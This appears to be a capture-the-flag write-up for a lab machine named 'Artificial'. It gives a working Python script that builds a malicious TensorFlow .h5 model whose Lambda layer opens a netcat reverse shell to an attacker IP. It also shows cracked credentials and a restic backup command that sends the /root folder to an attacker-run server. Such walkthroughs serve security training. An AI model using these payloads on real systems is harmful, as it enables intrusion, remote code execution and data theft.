# Artificial  ## 0x1 Recon ### Rustscan *  ### Nmap *  ### Website *  ### Dirsearch *  ## 0x2 Tensorflow RCE * Seems like AI module website, and have a login page and register page *  *  * When I register as `admin, system shows this username already exist *  * Login as user 123 we created, is upload page here, it accept the .h5 file *  *  :::info HDF5 is a file format of the HDF (Hierarchical Data Format) which is designed to store and organize large amounts of data. ::: * I make a revershell with `msfvenom` and named `rev.h5`, upload to the website *  *  * Click the `View Predictions` button, will lead us to `run_model`, but I'm not receive the shell *  *  * Download two file from the website *  * It used a libary call `tensorflow-cpu` on machine *  :::info `tensorflow` need python enviorment 3.6-3.9 ::: * Install `uv` and download the `python 3.8`, it will create a viturl enviorment * https://github.com/astral-sh/uv *  ```bash= curl -LsSf https://astral.sh/uv/install.sh | sh uv python install 3.8 uv venv --python 3.8 source .venv/bin/activate.fish ``` * Follow this article I build the docker enviroment with docker file * https://splint.gitbook.io/cyberblog/security-research/tensorflow-remote-code-execution-with-malicious-model#getting-the-rce *  *  ```bash= sudo docker build -t artifical . sudo docker run -it my-image ``` * Then make a reverse shell unserialization script with this python code *  ```python= import tensorflow as tf def exploit(x): import os os.system("rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 4444 >/tmp/f") return x model = tf.keras.Sequential() model.add(tf.keras.layers.Input(shape=(64,))) model.add(tf.keras.layers.Lambda(exploit)) model.compile() model.save("exploit.h5") ``` * Upload the malicious file and click the `View Predictions` button then got shell as `app` *  *  ## 0x3 Shell as gael * Some credential in `/instance` *  *  * Use `hashcat` crack the `gael`'s hash and got his password *  * `gael:mattp005numbertwo` * Connect machine as `gael` via ssh *  *  * Upload the `linpeas` and executed it *  *  * Interesting on this backupfile, but it just tar file, so only use `xvf` parameter *  *  ```bash= tar -xvf backrest_backup.tar.gz ``` * Password stored in `config.json` *  ## 0x4 Shell as root * Need base64 decode first, then cracked the password *  *  * `root:!@#$%^` * But it not a root's password, so I noticed on the open ports *  *  * Port forward the 9898 port *  *  ```bash= ssh gael@10.10.11.74 -L 9898:127.0.0.1:9898 ss -tuln ``` * Login `Backrest` as backrest_root *  * Creat a repo *  *  * It was found that this function is based on `restic` command, so follow the GTFObins *  * https://gtfobins.github.io/gtfobins/restic/ * I build a restic server first *  * https://github.com/restic/rest-server/releases/tag/v0.14.0 *  ```bash= ./rest-server --path /tmp/restic-data --listen ":$RPORT" --no-auth ``` * Then back to repo1 run the command below *  ```bash= init -r rest:http://10.10.16.2:12345/myrepo ``` * Backup the `/root` folder *  ```bash= -r rest:http://10.10.16.2:12345/myrepo backup /root ``` * Check and restore the snapshot *  ```bash= restic -r /tmp/restic-data/myrepo snapshots restic -r /tmp/restic-data/myrepo restore b5b6e87a --target ./restore ``` * And got root.txt & id_rsa *  *